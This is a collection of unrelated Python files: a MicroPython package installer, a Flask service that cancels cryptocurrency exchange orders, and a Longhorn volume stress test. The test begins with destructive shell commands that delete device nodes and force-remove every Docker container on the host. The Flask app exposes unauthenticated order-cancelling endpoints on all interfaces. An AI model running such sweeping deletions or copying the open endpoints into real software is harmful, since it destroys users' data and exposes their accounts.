if "/" in path:
assert path.count("/") == 1
self._serve_file(*path.split("/"))
else:
self._serve_distribution_page(path)
def _serve_distribution_page(self, dist_name: str) -> None:
logger.debug("Serving index page for %s", dist_name)
file_urls = self._downloader.get_file_urls(dist_name)
self.send_response(200)
self.send_header("Content-type", f"text/html; charset={SERVER_ENCODING}")
self.end_headers()
self.wfile.write("<!DOCTYPE html><html><body>\n".encode(SERVER_ENCODING))
for file_name in file_urls:
self.wfile.write(
f"<a href='/{dist_name}/{file_name}/'>{file_name}</a>\n".encode(SERVER_ENCODING)
)
self.wfile.write("</body></html>".encode(SERVER_ENCODING))
def _serve_file(self, dist_name, file_name):
logger.debug("Serving %s for %s", file_name, dist_name)
fp = self._downloader.download_file(dist_name, file_name)
self.send_response(200)
self.send_header("Content-Type", "application/octet-stream")
self.end_headers()
while True:
block = fp.read(4096)
if block:
self.wfile.write(block)
else:
break
class UserError(RuntimeError):
pass
class NotUpipCompatible(RuntimeError):
pass
def install(
spec: Union[List[str], str],
target_dir: str,
index_urls: List[str] = None,
port: Optional[str] = None,
):
if not index_urls:
index_urls = DEFAULT_INDEX_URLS
if isinstance(spec, str):
specs = [spec]
else:
specs = spec
temp_dir = tempfile.mkdtemp()
try:
_install_to_local_temp_dir(specs, temp_dir, index_urls)
_remove_unneeded_files(temp_dir)
if port is not None:
_copy_to_micropython_over_serial(temp_dir, port, target_dir)
else:
_copy_to_local_target_dir(temp_dir, target_dir)
finally:
shutil.rmtree(temp_dir, ignore_errors=True)
def _copy_to_local_target_dir(source_dir: str, target_dir: str):
logger.info("Copying files to %s", os.path.abspath(target_dir))
if not os.path.exists(target_dir):
logger.info("Target directory '%s' doesn't exist. Creating.", target_dir)
os.makedirs(target_dir, mode=0o700)
# Copying manually in order to be able to use os.fsync
# see https://learn.adafruit.com/adafruit-circuit-playground-express/creating-and-editing-code
# #1-use-an-editor-that-writes-out-the-file-completely-when-you-save-it
for root, dirs, files in os.walk(source_dir):
relative_dir = root[len(source_dir) :].lstrip("/\\")
full_target_dir = os.path.join(target_dir, relative_dir)
for dir_name in dirs:
full_path = os.path.join(full_target_dir, dir_name)
if os.path.isdir(full_path):
logger.info("Directory %s already exists", os.path.join(relative_dir, dir_name))
elif os.path.isfile(full_path):
raise UserError("Can't treat existing file %s as directory", full_path)
else:
logger.info("Creating %s", os.path.join(relative_dir, dir_name))
os.makedirs(full_path, 0o700)
for file_name in files:
full_source_path = os.path.join(root, file_name)
full_target_path = os.path.join(full_target_dir, file_name)
logger.debug("Preparing %s => %s", full_source_path, full_target_path)
if os.path.isfile(full_target_path):
logger.info("Overwriting %s", os.path.join(relative_dir, file_name))
elif os.path.isdir(full_target_path):
raise UserError("Can't treat existing directory %s as file", full_target_path)
else:
logger.info("Copying %s", os.path.join(relative_dir, file_name))
with open(full_source_path, "rb") as in_fp, open(full_target_path, "wb") as out_fp:
out_fp.write(in_fp.read())
out_fp.flush()
os.fsync(out_fp)
def _copy_to_micropython_over_serial(source_dir: str, port: str, target_dir: str):
assert target_dir.startswith("/")
cmd = _get_rshell_command() + ["-p", port, "rsync", source_dir, "/pyboard" + target_dir]
logger.debug("Uploading with rsync: %s", shlex_join(cmd))
subprocess.check_call(cmd)
def _get_rshell_command() -> Optional[List[str]]:
if shutil.which("rshell"):
return ["rshell"]
else:
return None
def _install_to_local_temp_dir(
specs: List[str], temp_install_dir: str, index_urls: List[str]
) -> None:
pip_specs = _install_all_upip_compatible(specs, temp_install_dir, index_urls)
if pip_specs:
_install_with_pip(pip_specs, temp_install_dir, index_urls)
def _install_all_upip_compatible(
specs: List[str], install_dir: str, index_urls: List[str]
) -> List[str]:
"""Returns list of specs which must be installed with pip"""
installed_specs = set()
specs_to_be_processed = specs.copy()
pip_specs = []
while specs_to_be_processed:
spec = specs_to_be_processed.pop(0)
if spec in installed_specs or spec in pip_specs:
continue
req = pkg_resources.Requirement.parse(spec)
logger.info("Processing '%s'", req)
meta, version = _fetch_metadata_and_resolve_version(req, index_urls)
logger.info("Inspecting version %s", version)
assets = meta["releases"][version]
if len(assets) != 1 or not assets[0]["url"].endswith(".tar.gz"):
logger.info(
"'%s' will be installed with pip (not having single tar.gz asset).",
req.project_name,
)
pip_specs.append(spec)
continue
try:
dep_specs = _install_single_upip_compatible_from_url(
req.project_name, assets[0]["url"], install_dir
)
installed_specs.add(spec)
if dep_specs:
logger.info("Dependencies of '%s': %s", spec, dep_specs)
for dep_spec in dep_specs:
if dep_spec not in installed_specs and dep_spec not in specs_to_be_processed:
specs_to_be_processed.append(dep_spec)
except NotUpipCompatible:
pip_specs.append(spec)
return pip_specs
def _install_single_upip_compatible_from_url(
project_name: str, url: str, target_dir: str
) -> List[str]:
with urlopen(url) as fp:
download_data = fp.read()
tar = tarfile.open(fileobj=io.BytesIO(download_data), mode="r:gz")
deps = []
content: Dict[str, Optional[bytes]] = {}
for info in tar:
if "/" in info.name:
dist_name, rel_name = info.name.split("/", maxsplit=1)
else:
dist_name, rel_name = info.name, ""
if rel_name == "setup.py":
logger.debug("The archive contains setup.py. The package will be installed with pip")
raise NotUpipCompatible()
if ".egg-info/PKG-INFO" in rel_name:
continue
if ".egg-info/requires.txt" in rel_name:
for line in tar.extractfile(info):
line = line.strip()
if line and not line.startswith(b"#"):
deps.append(line.decode())
continue
if ".egg-info" in rel_name:
continue
if info.isdir():
content[os.path.join(target_dir, rel_name)] = None
elif info.isfile():
content[os.path.join(target_dir, rel_name)] = tar.extractfile(info).read()
# write files only after the package is fully inspected and found to be upip compatible
logger.info("Extracting '%s' from %s to %s", project_name, url, os.path.abspath(target_dir))
for path in content:
data = content[path]
if data is None:
os.makedirs(path, exist_ok=True)
else:
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path, "wb") as fp:
fp.write(data)
return deps
def _install_with_pip(specs: List[str], target_dir: str, index_urls: List[str]):
global _server
logger.info("Installing with pip: %s", specs)
suitable_indexes = [url for url in index_urls if url != MP_ORG_INDEX]
if not suitable_indexes:
raise UserError("No suitable indexes for pip")
index_args = ["--index-url", suitable_indexes.pop(0)]
while suitable_indexes:
index_args += ["--extra-index-url", suitable_indexes.pop(0)]
if index_args == ["--index-url", "https://pypi.org/pypi"]:
# for some reason, this form does not work for some versions of some packages
# (eg. micropython-os below 0.4.4)
index_args = []
port = 8763
_server = MinipipServer(("", port), MinipipProxyHandler)
threading.Thread(name="minipip proxy", target=_server.serve_forever).start()
index_args = ["--index-url", "http://localhost:{port}/".format(port=port)]
args = [
"--no-input",
"--disable-pip-version-check",
"install",
"--no-compile",
"--upgrade",
"--target",
target_dir,
] + index_args
pip_cmd = (
[
sys.executable,
"-m",
"pip",
]
+ args
+ specs
)
logger.debug("Calling pip: %s", shlex_join(pip_cmd))
subprocess.check_call(pip_cmd)
close_server()
def _fetch_metadata_and_resolve_version(
req: Requirement, index_urls: List[str]
) -> Tuple[Dict[str, Any], str]:
ver_specs = req.specs
for i, index_url in enumerate(index_urls):
try:
url = "%s/%s/json" % (index_url, req.project_name)
logger.info("Querying package metadata from %s", url)
with urlopen(url) as fp:
meta = json.load(fp)
current_version = meta["info"]["version"]
if not ver_specs:
return meta, current_version
ver = _resolve_version(req, meta)
if ver is None:
logger.info("Could not find suitable version from %s", index_url)
continue
return meta, ver
except HTTPError as e:
if e.code == 404:
logger.info("Could not find '%s' from %s", req.project_name, index_url)
else:
raise
raise UserError(
"Could not find '%s' from any of the indexes %s" % (req.project_name, index_urls)
)
def _read_requirements(req_file: str) -> List[str]:
if not os.path.isfile(req_file):
raise UserError("Can't find file '%s'" % req_file)
result = []
with open(req_file, "r", errors="replace") as fp:
for line in fp:
line = line.strip()
if line and not line.startswith("#"):
result.append(line)
return result
def _resolve_version(req: Requirement, main_meta: Dict[str, Any]) -> Optional[str]:
matching_versions = []
for ver in main_meta["releases"]:
if ver in req and len(main_meta["releases"][ver]) > 0:
matching_versions.append(ver)
if not matching_versions:
return None
return sorted(matching_versions, key=pkg_resources.parse_version)[-1]
def _remove_unneeded_files(path: str) -> None:
unneeded = ["Scripts" if os.name == "nt" else "bin", "__pycache__"]
if "adafruit_blinka" in os.listdir(path):
unneeded += [
"adafruit_blinka",
"adafruit_platformdetect",
"Adafruit_PureIO",
"microcontroller",
"pyftdi",
"serial",
"usb",
"analogio.py",
"bitbangio.py",
"board.py",
"busio.py",
"digitalio.py",
"micropython.py",
"neopixel_write.py",
"pulseio.py",
"pwmio.py",
"rainbowio.py",
]
unneeded_suffixes = [".dist-info", ".egg-info", ".pyc"]
for name in os.listdir(path):
if name in unneeded or any(name.endswith(suffix) for suffix in unneeded_suffixes):
full_path = os.path.join(path, name)
if os.path.isfile(full_path):
os.remove(full_path)
else:
shutil.rmtree(full_path)
def error(msg):
msg = "ERROR: " + msg
if sys.stderr.isatty():
print("\x1b[31m", msg, "\x1b[0m", sep="", file=sys.stderr)
else:
print(msg, file=sys.stderr)
return 1
def main(raw_args: Optional[List[str]] = None) -> int:
if raw_args is None:
raw_args = sys.argv[1:]
import argparse
parser = argparse.ArgumentParser(
description="Tool for managing MicroPython and CircuitPython packages"
)
subparsers = parser.add_subparsers(
dest="command",
title="commands",
description='Use "minipip <command> -h" for usage help of a command ',
required=True,
)
install_parser = subparsers.add_parser(
"install",
help="Install a package",
description=textwrap.dedent(
"""
Meant for installing both upip and pip compatible distribution packages from
PyPI and micropython.org/pi to a local directory, USB volume or directly to
MicroPython filesystem over serial connection (requires rshell).
"""
).strip(),
)
install_parser.add_argument(
"specs",
help="Package specification, eg. 'micropython-os' or 'micropython-os>=0.6'",
nargs="*",
metavar="package_spec",
)
install_parser.add_argument(
"-r",
"--requirement",
help="Install from the given requirements file.",
nargs="*",
dest="requirement_files",
metavar="REQUIREMENT_FILE",
default=[],
)
install_parser.add_argument(
"-p",
"--port",
help="Serial port of the device "
"(specify if you want minipip to upload the result to the device)",
nargs="?",
)
install_parser.add_argument(
"-t",
"--target",
help="Target directory (on device, if port is given, otherwise local)",
default=".",
dest="target_dir",
metavar="TARGET_DIR",
required=True,
)
list_parser = subparsers.add_parser("list", help="List installed packages")
for p in [install_parser, list_parser]:
p.add_argument(
"-i",
"--index-url",
help="Custom index URL",
)
p.add_argument(
"-v",
"--verbose",
help="Show more details about the process",
action="store_true",
)
p.add_argument(
"-q",
"--quiet",
help="Don't show non-error output",
action="store_true",
)
parser.add_argument(
"--version", help="Show program version and exit", action="version", version=__version__
)
args = parser.parse_args(args=raw_args)
if args.command != "install":
sys.exit(error("Sorry, only 'install' command is supported at the moment"))
all_specs = args.specs
try:
for req_file in args.requirement_files:
all_specs.extend(_read_requirements(req_file))
except UserError as e:
sys.exit(error(str(e)))
if args.index_url:
index_urls = [args.index_url]
else:
index_urls = DEFAULT_INDEX_URLS
if args.quiet and args.verbose:
print("Can't be quiet and verbose at the same time", file=sys.stderr)
sys.exit(1)
if args.verbose:
logging_level = logging.DEBUG
elif args.quiet:
logging_level = logging.ERROR
else:
logging_level = logging.INFO
logger.setLevel(logging_level)
logger.propagate = True
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setLevel(logging_level)
logger.addHandler(console_handler)
if args.port and not _get_rshell_command():
return error("Could not find rshell (required for uploading when serial port is given)")
if args.port and not args.target_dir.startswith("/"):
return error("If port is given then target dir must be absolute Unix-style path")
if not all_specs:
return error("At least one package specifier or non-empty requirements file is required")
try:
install(all_specs, target_dir=args.target_dir, index_urls=index_urls, port=args.port)
except KeyboardInterrupt:
return 1
except UserError as e:
return error(str(e))
except subprocess.CalledProcessError:
# assuming the subprocess (pip or rshell) already printed the error
return 1
finally:
close_server()
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
|
run.py
|
import os
import time
from datetime import datetime
import logging
from flask import Flask
from flask import jsonify
import asyncio
import sys
from flask import request
from multiprocessing import Process
sys.path.append('../')
sys.path.append('../../')
sys.path.append('../strategy/')
from dquant.markets._binance_spot_rest import Binance
from dquant.markets._bitfinex_spot_rest import TradingV1
from dquant.markets._huobi_spot_rest import HuobiRest
from dquant.markets._okex_spot_rest import OkexSpotRest
from dquant.constants import Constants
from dquant.common.depth_log import init_roll_log
from flask_cors import *
app = Flask(__name__)
app.config['JSON_AS_ASCII'] = False
CORS(app, supports_credentials=True)
meta_binance = ['eth_usdt', 'btc_usdt', 'eth_btc', 'eos_eth', 'bcc_eth']
meta_bfx = ['eth_btc']
meta_huobi = ['eth_usdt', 'eth_btc', 'eos_eth']
meta_ok = ['eth_usdt', 'eth_btc', 'btc_usdt', 'eos_eth', 'bch_eth']
meta_ok_symbol = ['btc_usd', 'eth_usd']
meta_ok_future_to_spot = {'btc_usd': 'btc_usdt', 'eth_usd': 'eth_usdt'}
meta_ok_contract = ['this_week', 'next_week', 'quarter']
# meta_ok_future = [s+'_'+c for s in meta_ok_symbol for c in meta_ok_contract]
os.environ[Constants.DQUANT_ENV] = "dev"
dlogger = init_roll_log('cancel_order.log')
logger = logging.getLogger("dquant")
okex_last_open_long_timestamp = None
def sucess_fail_record(platform, res):
if res['success']:
dlogger.info('{}: cancel {} sucessfuly'.format(platform, res['success']))
if res['fail']:
dlogger.info('{}: cancel {} failed'.format(platform, res['fail']))
@app.route('/cancel/binance/active_orders/get', methods=['GET'])
def get_binance_active_orders():
res = []
for meta_code in meta_binance:
bi = Binance(meta_code)
tmp = bi.get_active_orders()
if 'code' in tmp and 'msg' in tmp:
continue
res.extend(bi.get_active_orders())
return jsonify(res)
@app.route('/cancel/binance/active_orders/del', methods=['DELETE'])
def del_binance_active_orders():
res = {'result': True, 'success': [], 'fail': []}
for meta_code in meta_binance:
bi = Binance(meta_code)
tmp = bi.cancel_active_orders()
res['success'].extend(tmp['success'])
res['fail'].extend(tmp['fail'])
sucess_fail_record('binance', res)
return jsonify(res)
@app.route('/cancel/bfx/active_orders/get', methods=['GET'])
def get_bfx_active_orders():
res = []
for meta_code in meta_bfx:
bfx = TradingV1(meta_code)
res.extend(bfx.get_active_orders())
return jsonify(res)
@app.route('/cancel/bfx/active_orders/del', methods=['DELETE'])
def del_bfx_active_orders():
res = {'result': True}
for meta_code in meta_bfx:
bfx = TradingV1(meta_code)
tmp = bfx.cancel_active_orders()
print('tmp:', tmp)
if tmp['result'] == 'None to cancel':
continue
else:
dlogger.debug('bfx cancel result: {}'.format(res))
return jsonify(res)
res['result'] = False
return res
@app.route('/cancel/huobi/active_orders/get', methods=['GET'])
def get_huobi_active_orders():
res = []
loop = asyncio.new_event_loop()
for meta_code in meta_huobi:
hb = HuobiRest(meta_code, loop)
res.extend(hb.get_activate_orders())
return jsonify(res)
@app.route('/cancel/huobi/active_orders/del', methods=['DELETE'])
def del_huobi_active_orders():
res = {'result': True, 'success': [], 'fail': []}
loop = asyncio.new_event_loop()
for meta_code in meta_huobi:
hb = HuobiRest(meta_code, loop)
tmp = hb.cancel_active_orders().get('data', {})
if tmp:
res['success'].extend(tmp['success'])
res['fail'].extend(tmp['failed'])
sucess_fail_record('huobi', res)
return jsonify(res)
@app.route('/cancel/okex/active_orders/get', methods=['GET'])
def get_okex_active_orders():
res = []
for meta_code in meta_ok:
ok = OkexSpotRest(meta_code)
res.extend(ok.get_active_orders())
return jsonify(res)
@app.route('/cancel/okex/active_orders/del', methods=['DELETE'])
def del_okex_active_orders():
'''
:return: {'success': [1,23], 'fail': [4]}
'''
res = {'result': True, 'success': [], 'fail': []}
for meta_code in meta_ok:
ok = OkexSpotRest(meta_code)
tmp = ok.cancel_active_orders()
if 'success' in tmp:
res['success'].extend(tmp['success'].split(','))
res['fail'].extend(tmp['error'].split(','))
elif 'result' in tmp:
if tmp['result']:
res['success'].append(tmp['order_id'])
else:
res['fail'].append(tmp['order_id'])
sucess_fail_record('okex', res)
return jsonify(res)
#
# @app.route('/cancel/okex_future/active_orders/get/<symbol>', methods=['GET'])
# def get_okexf_active_orders(symbol):
# # res_all = {}
# res = {'active_orders':[],
# 'positions':[],
# 'force_liqu_price':'',
# 'spot_price': 0,
# 'future_index': 0,
# 'premiums_and_discounts': 0,
# 'timestamp': int(time.time())}
# if symbol not in meta_ok_symbol:
# return jsonify(res)
# ok_f_index = OkexFutureRest(symbol+'_'+ 'this_week')
# ret_index = ok_f_index.get_index()
# ok_spot = OkexSpotRest(meta_ok_future_to_spot[symbol])
# ret_ticker = ok_spot.get_ticker()
# for meta_contract in meta_ok_contract:
# real_meta = symbol+'_'+ meta_contract
# # res = {'active_orders': [], 'positions': [], 'force_liqu_price': ''}
# ok_f = OkexFutureRest(real_meta)
# # res.extend(ok_f.get_active_orders())
# res['active_orders'].extend(ok_f.get_active_orders())
# ret_position = ok_f.getPosition()
# if ret_position and ret_ticker and ret_index:
# res['force_liqu_price'] = ret_position['force_liqu_price']
# # res_all[meta_code] = res
# res['spot_price'] = float(ret_ticker['ticker']['last'])
# res['timestamp'] = int(ret_ticker['date'])
# res['future_index'] = float(ret_index['future_index'])
# premiums_and_discounts = float(res['future_index'] - res['spot_price'])
# res['premiums_and_discounts'] = premiums_and_discounts
# if ret_position['holding']:
# for holding in ret_position['holding']:
# long_prifit_and_loss = 0.0
# if not holding['buy_available']:
# holding.update({"long_prifit_and_loss": long_prifit_and_loss})
# else:
# buy_available = float(holding['buy_available'])
# buy_price_avg = float(holding['buy_price_avg'])
# print(buy_available, buy_price_avg)
# long_prifit_and_loss = premiums_and_discounts * buy_available * 100 / buy_price_avg
# holding.update({"long_prifit_and_loss": long_prifit_and_loss})
# res['positions'].extend(ret_position['holding'])
# return jsonify(res)
# # return jsonify(res_all)
#
# @app.route('/cancel/okex_future/active_orders/del/<symbol>/long', methods=['DELETE'])
# def close_okexf_long_orders(symbol):
# # 分三步:1.取消未完成订单 2.平仓 3.补回现货
# res = {'result': False, 'success': [], 'fail': [], 'spot_results':[], 'msg':''}
# if symbol not in meta_ok_symbol:
# res['msg'] = u"暂不支持此类合约"
# return jsonify(res)
# spot_balance = OkexSpotRest(meta_ok_future_to_spot[symbol]).get_buy_balance_for_future()
# for meta_contract in meta_ok_contract:
# real_meta = symbol + '_' + meta_contract
# ok = OkexFutureRest(real_meta)
# ret_position = ok.getPosition()
# buy_available = 0
# if ret_position and 'holding' in ret_position:
# for holding in ret_position['holding']:
# buy_available += holding['buy_available']
# if spot_balance < buy_available*100:
# res['msg'] += u"现货账户余额不足:%s usdt; " % spot_balance
# return jsonify(res)
# ok.cancel_all_orders()
# result = ok.close_all_long_orders()
# res['success'].extend(result['success'])
# res['fail'].extend(result['fail'])
# price_to_be_buy_spot = float(result['success_amount']) * 100
# logger.info("price_to_be_buy_spot: %s" % price_to_be_buy_spot)
# if price_to_be_buy_spot:
# # spot_balance = OkexSpotRest(meta_ok_future_to_spot[symbol]).get_buy_balance_for_future()
# # if spot_balance < price_to_be_buy_spot:
# # res['msg'] += u"现货账户余额不足:%s usdt; " % spot_balance
# # return jsonify(res)
# ok_spot = OkexSpotRest(meta_ok_future_to_spot[symbol])
# spot_result = ok_spot.buy_step_by_step(price_to_be_buy_spot, 10)
# logger.info("flask %s price_to_be_buy_spot result: %s" % (meta_ok_future_to_spot[symbol], spot_result))
# res['spot_results'] = spot_result
# res['result'] = True
# return jsonify(res)
#
# @app.route('/cancel/okex_future/active_orders/del/<symbol>/short', methods=['DELETE'])
# def close_okexf_short_orders(symbol):
# res = {'result': True, 'success': [], 'fail': [], 'msg':''}
# if symbol not in meta_ok_symbol:
# res['msg'] = u"暂不支持此类合约"
# return jsonify(res)
# for meta_contract in meta_ok_contract:
# real_meta = symbol + '_' + meta_contract
# ok = OkexFutureRest(real_meta)
# result = ok.close_all_short_orders()
# res['success'].extend(result['success'])
# res['fail'].extend(result['fail'])
# return jsonify(res)
#
#
# @app.route('/cancel/okex_future/open_position/<symbol>/<contract>/<amount>', methods=['get'])
# def open_okexf_long_orders_get(symbol, contract, amount):
# res = {'result': False, 'msg': ''}
# now = time.time()
# global okex_last_open_long_timestamp
# if okex_last_open_long_timestamp and now - okex_last_open_long_timestamp <= 1:
# logger.error("Double click: now: %s, last: %s" % (now, okex_last_open_long_timestamp))
# res['msg'] = u"请不要在1秒内多次点击开仓"
# return jsonify(res)
# okex_last_open_long_timestamp = now
# symbol_map = {'btc_usd': 'btc_usdt', 'eth_usd':'eth_usdt'}
# symbol = symbol
# contract = contract
# amount = amount
# if not (symbol in meta_ok_symbol and contract in meta_ok_contract and amount):
# res['msg'] = u"暂不支持此类合约"
# return jsonify(res)
# else:
# spot_balance_base = OkexSpotRest(symbol_map[symbol]).get_sell_balance_for_future()
# if spot_balance_base < float(amount) * 100:
# res['msg'] = u"现货账户余额不足:%s usdt" % spot_balance_base
# return jsonify(res)
# real_future_meta = symbol + '_' + contract
# Process(target=create_hedging_process, args=(float(amount), real_future_meta, symbol_map[symbol],)).start()
# # okexHedge = Hedging(float(amount), real_future_meta, symbol_map[symbol])
# # okexHedge.setDaemon(True)
# # okexHedge.start()
# res['msg'] = u"成功"
# res = {'result': True}
# return jsonify(res)
@app.route('/cancel/history/binance/orders', methods=['GET'])
def binance_history_orders_get():
logger.debug('{} called at {}'.format(sys._getframe().f_code.co_name, datetime.now()))
bi = Binance('eth_usdt')
res = bi.get_our_history_orders()
return jsonify(res)
@app.route('/cancel/history/bitfinex/orders', methods=['GET'])
def bitfinex_history_orders_get():
logger.debug('{} called at {}'.format(sys._getframe().f_code.co_name, datetime.now()))
bfx = TradingV1('eth_usdt')
res = bfx.get_our_history_orders()
return jsonify(res)
@app.route('/cancel/history/huobi/orders', methods=['GET'])
def huobi_history_orders_get():
logger.debug('{} called at {}'.format(sys._getframe().f_code.co_name, datetime.now()))
loop = asyncio.new_event_loop()
hb = HuobiRest('eth_usdt', loop)
res = hb.get_our_history_orders()
return jsonify(res)
# @app.route('/cancel/okex_future/open_position', methods=['POST'])
# def open_okexf_long_orders():
# res = {'result': False}
# symbol_map = {'btc_usd': 'btc_usdt', 'eth_usd':'eth_usdt'}
# symbol = request.form.get('symbol', '')
# contract = request.form.get('contract', '')
# amount = request.form.get('amount', 0.0)
# if not (symbol in meta_ok_symbol and contract in meta_ok_contract and amount):
# return jsonify(res)
# else:
# real_future_meta = symbol + '_' + contract
# okexHedge = Hedging(float(amount), real_future_meta, symbol_map[symbol])
# # okexHedge.setDaemon(True)
# okexHedge.start()
# res = {'result': True}
# return jsonify(res)
if __name__ == "__main__":
os.environ[Constants.DQUANT_ENV] = "dev"
port = int(sys.argv[1]) if len(sys.argv) >= 2 else 5000
app.run(host='0.0.0.0', port=port)
|
teardown-test.py
|
import subprocess
import time
import random
import sys
import threading
import time
import os
import directio
import mmap
from os import path
import stat
import datetime
from multiprocessing import Process, Manager, Array, current_process, Lock
subprocess.call("sudo iscsiadm -m node --logout", shell=True)
subprocess.call("sudo rm /dev/longhorn/vol*", shell=True)
#subprocess.call("docker rm -fv `docker ps -a | grep rancher/longhorn | awk '{print $1}'`", shell=True)
subprocess.call("docker rm -fv `docker ps -qa`", shell=True)
subprocess.call("docker network rm longhorn-net", shell=True)
subprocess.call("docker network create --subnet=172.18.0.0/16 longhorn-net", shell=True)
NUM_PAGES = 16
PAGE_SIZE = 4096
DATA_LEN = NUM_PAGES * PAGE_SIZE
MAX_RETRY = 5
WAIT_TIMEOUT = 300
def readat_direct(dev, offset, length):
pg = offset / PAGE_SIZE
in_page_offset = offset % PAGE_SIZE
# either read less than a page, or whole pages
if in_page_offset != 0:
assert pg == (offset + length - 1) / PAGE_SIZE
to_read = PAGE_SIZE
else:
assert length % PAGE_SIZE == 0
to_read = length
pg_offset = pg * PAGE_SIZE
f = os.open(dev, os.O_DIRECT | os.O_RDONLY)
try:
os.lseek(f, pg_offset, os.SEEK_SET)
ret = directio.read(f, to_read)
except OSError as e:
print "%s: encounter error in readat_direct for %s" \
% (datetime.datetime.now(), dev)
raise
finally:
os.close(f)
return ret[in_page_offset: in_page_offset + length]
def writeat_direct(dev, offset, data):
pg = offset / PAGE_SIZE
# don't support across page write
assert pg == (offset + len(data) - 1) / PAGE_SIZE
pg_offset = pg * PAGE_SIZE
f = os.open(dev, os.O_DIRECT | os.O_RDWR)
m = mmap.mmap(-1, PAGE_SIZE)
try:
os.lseek(f, pg_offset, os.SEEK_SET)
pg_data = readat_direct(dev, pg_offset, PAGE_SIZE)
m.write(pg_data)
m.seek(offset % PAGE_SIZE)
m.write(data)
ret = directio.write(f, m)
except OSError as e:
print "%s: encounter error in readat_direct for %s" \
% (datetime.datetime.now(), dev)
raise
finally:
m.close()
os.close(f)
return ret
def write_data(i, pattern):
for page in xrange(0, NUM_PAGES):
writeat_direct("/dev/longhorn/vol" + str(i), page * PAGE_SIZE, str(chr(pattern))*PAGE_SIZE)
def check_data(i, pattern):
for page in xrange(0, NUM_PAGES):
data = readat_direct("/dev/longhorn/vol" + str(i), page * PAGE_SIZE, PAGE_SIZE)
assert ord(data[0]) == pattern
def create_snapshot(controller):
return subprocess.check_output(("docker exec " + controller + " launch snapshot create").split()).rstrip()
def revert_snapshot(snap, controller):
subprocess.check_call("docker exec " + controller + " launch snapshot revert " + snap, shell = True)
def wait_for_dev_ready(i, iteration, controller):
dev = "/dev/longhorn/vol" + str(i)
init_time = time.time()
while time.time() - init_time < WAIT_TIMEOUT:
if os.path.exists(dev):
mode = os.stat(dev).st_mode
if stat.S_ISBLK(mode):
print "%s: iteration = %d thread = %d : Device ready after %.3f seconds" \
% (datetime.datetime.now(), iteration, i, time.time() - init_time)
return
time.sleep(0.05)
print "%s: iteration = %d thread = %d : FAIL TO WAIT FOR DEVICE READY, docker logs:" \
% (datetime.datetime.now(), iteration, i)
subprocess.call("docker logs " + controller, shell=True)
return
def wait_for_dev_deleted(i, iteration, controller):
dev = "/dev/longhorn/vol" + str(i)
init_time = time.time()
while time.time() - init_time < WAIT_TIMEOUT:
if not os.path.exists(dev):
print "%s: iteration = %d thread = %d : Device deleted after %.3f seconds" \
% (datetime.datetime.now(), iteration, i, time.time() - init_time)
return
time.sleep(0.05)
print "%s: iteration = %d thread = %d : FAIL TO WAIT FOR DEVICE DELETED, docker logs:" \
% (datetime.datetime.now(), iteration, i)
subprocess.call("docker logs " + controller, shell=True)
return
def run_test(thread, iterations):
for iteration in xrange(iterations):
replica1_ip = "172.18.%d.%d" % (iteration % 80 + 1, thread)
replica1 = subprocess.check_output(("docker run -d --name r1-%d-%d" % (iteration, thread) + \
" --net longhorn-net --ip %s --expose 9502-9504 -v /volume" % (replica1_ip) + \
" rancher/longhorn launch replica --listen %s:9502 --size %d /volume" \
% (replica1_ip, DATA_LEN)).split()).rstrip()
print "%s: iteration = %d thread = %d name = r1-%d-%d replica1 = %s ip = %s" \
% (datetime.datetime.now(), iteration, thread, iteration, thread,
replica1, replica1_ip)
replica2_ip = "172.18.%d.%d" % (iteration % 80 + 81, thread)
replica2 = subprocess.check_output(("docker run -d --name r2-%d-%d" % (iteration, thread) + \
" --net longhorn-net --ip %s --expose 9502-9504 -v /volume" % (replica2_ip) + \
" rancher/longhorn launch replica --listen %s:9502 --size %d /volume" \
% (replica2_ip, DATA_LEN)).split()).rstrip()
print "%s: iteration = %d thread = %d name = r2-%d-%d replica2 = %s ip = %s" \
% (datetime.datetime.now(), iteration, thread, iteration, thread,
replica2, replica2_ip)
controller_ip = "172.18.%d.%d" % (iteration % 80 + 161, thread)
controller_name = "c-%d-%d" % (iteration, thread)
started = False
count = 0
print "About to create controller for " + controller_name
while not started and count < MAX_RETRY:
try:
controller = subprocess.check_output(("docker run -d --name %s" % (controller_name) + \
" --net longhorn-net --ip %s --privileged -v /dev:/host/dev" % (controller_ip) + \
" -v /proc:/host/proc rancher/longhorn launch controller --frontend tgt" + \
" --replica tcp://%s:9502 --replica tcp://%s:9502 vol%d" \
% (replica1_ip, replica2_ip, thread)).split()).rstrip()
print "controller %s created as %s" % (controller_name, controller)
started = True
except subprocess.CalledProcessError as ex:
status = subprocess.check_output(
"docker ps -a -f NAME=%s --format {{.Status}}" \
% (controller_name), shell=True)
if status != "" and status.strip() != "Created":
raise ex
# Now we know it's the Docker race bug
print "Docker's bug result in failed to start controller, retrying: " + str(ex)
subprocess.call("docker rm -fv " + controller_name, shell=True)
time.sleep(1)
count += 1
assert started
wait_for_dev_ready(thread, iteration, controller)
print "%s: iteration = %d thread = %d name = c-%d-%d controller = %s ip = %s" \
% (datetime.datetime.now(), iteration, thread, iteration, thread,
controller, controller_ip)
pattern1 = int(255 * random.random())
write_data(thread, pattern1)
check_data(thread, pattern1)
snap = create_snapshot(controller)
assert snap != ""
pattern2 = int(255 * random.random())
write_data(thread, pattern2)
check_data(thread, pattern2)
if random.random() < 0.1:
print "%s: iteration = %d thread = %d sleep 30 seconds" \
% (datetime.datetime.now(), iteration, thread)
time.sleep(30)
revert_snapshot(snap, controller)
wait_for_dev_ready(thread, iteration, controller)
check_data(thread, pattern1)
subprocess.call("docker stop %s" % (controller), shell=True)
wait_for_dev_deleted(thread, iteration, controller)
subprocess.call("docker stop %s %s" % (replica1, replica2), shell=True)
subprocess.call("docker rm -fv %s %s %s" % (controller, replica1, replica2), shell=True)
workers = []
for thread in range(20):
p = Process(target = run_test, args = (thread + 1, 1000))
workers.append(p)
p.start()
for p in workers:
p.join()
|
test_asyncore.py
|
# expected: fail
import asyncore
import unittest
import select
import os
import socket
import sys
import time
import warnings
import errno
import struct
from test import test_support
from test.test_support import TESTFN, run_unittest, unlink, HOST
from StringIO import StringIO
try:
import threading
except ImportError:
threading = None
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
